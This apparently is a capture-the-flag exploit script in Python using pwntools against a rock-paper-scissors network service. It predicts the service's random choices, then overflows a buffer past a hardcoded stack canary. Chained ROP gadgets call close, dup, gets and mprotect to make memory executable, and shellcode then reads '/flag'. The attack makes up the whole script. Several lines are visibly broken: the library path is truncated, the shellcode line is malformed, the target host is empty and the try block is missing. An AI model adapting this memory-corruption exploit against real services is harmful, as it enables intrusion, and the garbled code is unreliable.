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Created October 11, 2020 11:51
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#!/usr/bin/env python3
from pwn import *
import ctypes
context.os = 'linux'
context.arch = 'amd64'
LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/')
def get_win():
x = LIBC.rand() % 3
if x == 0:
return b'paper'
if x == 1:
return b'scissors'
return b'rock'
canary = b'\x00\x19\x49\x64\x11\x9d\x7d\xed'
base = 0x563e30716000
libc_base = 0x7fed1d73f000
fd = 0x4
shellcode = asm('/flag', fd))
while True:
r = remote('', 12345)
pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202330) + p64(base + 0xf12)
r.sendafter('Your choice: ', pay)
rop = b''
rop += p64(base + 0x13eb) # pop rdi; ret
rop += p64(0x0) # stdin
rop += p64(libc_base + 0x111970) # close
rop += p64(base + 0xf0b)
pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x202300) + p64(base + 0x111F)
r.sendafter('Your choice: ', pay)
rop = b''
rop += p64(base + 0x13eb) # pop rdi; ret
rop += p64(fd) # fd
rop += p64(libc_base + 0x111a00) # dup
rop += p64(base + 0xf0b)
pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f8) + p64(base + 0x111F)
r.sendafter('Your choice: ', pay)
rop = b''
rop += p64(base + 0x13eb) # pop rdi; ret
rop += p64(base + 0x202100) # buf
rop += p64(libc_base + 0x86af0) # gets
rop += p64(base + 0xf0b)
pay = get_win().ljust(8, b'\x00') + rop.ljust(32, b'\x00') + canary + p64(base + 0x2022f0) + p64(base + 0x111F)
r.sendafter('Your choice: ', pay)
rop = b'/bin/sh\x00'
rop += p64(base + 0x13eb) # pop rdi; ret
rop += p64(base + 0x202000) # buf
rop += p64(base + 0x13e9) # pop rsi; pop r15; ret
rop += p64(0x1000) # size
rop += p64(0x0)
rop += p64(libc_base + 0x11c371) # pop rdx; pop r12; ret
rop += p64(0x7) # RWX
rop += p64(0x0)
rop += p64(libc_base + 0x11bb00) # mprotect
rop += p64(libc_base + 0x4543d) # push rsp; ret
r.sendline(rop + shellcode)
pay = get_win().ljust(40, b'\x00') + canary + p64(base + 0x202100) + p64(base + 0x111F)
r.sendafter('Your choice: ', pay)
except EOFError:
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